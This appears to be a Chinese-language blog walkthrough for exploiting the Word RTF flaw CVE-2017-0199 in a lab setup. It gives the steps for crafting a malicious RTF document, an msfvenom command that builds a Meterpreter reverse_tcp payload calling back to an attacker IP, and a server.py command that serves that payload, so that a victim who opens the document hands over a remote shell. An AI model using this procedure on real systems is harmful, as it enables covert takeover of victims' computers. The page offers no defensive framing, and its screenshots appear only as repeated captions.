你打开我的word,就会被我控制(CVE-2017-0199)

准备工作:
攻击者电脑(kali):192.168.1.130
被攻击者电脑(win7):192.168.115
下载漏洞利用工具:https://github.com/haibara3839/CVE-2017-0199-master
把innocent.doc和server.py两个文件放到攻击者电脑上,并开启Apache服务
漏洞利用:
1、新建个word,向下面这样配置

你打开我的word,就会被我控制(CVE-2017-0199)_第1张图片

2、保存成RTF格式

你打开我的word,就会被我控制(CVE-2017-0199)_第2张图片

3、使用记事本打开test.rtf文件,在文件中查找objautlink,然后在objautlink后面插入objupdate

你打开我的word,就会被我控制(CVE-2017-0199)_第3张图片

4、然后配置反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f exe > shell.exe
5、运行server.py服务

先把Apache服务关闭
python server.py 80 http://192.168.1.130/shell.exe /var/www/html/shell.exe
被攻击端打开word,点击是

你打开我的word,就会被我控制(CVE-2017-0199)_第4张图片

成功返回shell

你打开我的word,就会被我控制(CVE-2017-0199)_第5张图片
你打开我的word,就会被我控制(CVE-2017-0199)_第6张图片

你可能感兴趣的:(你打开我的word,就会被我控制(CVE-2017-0199))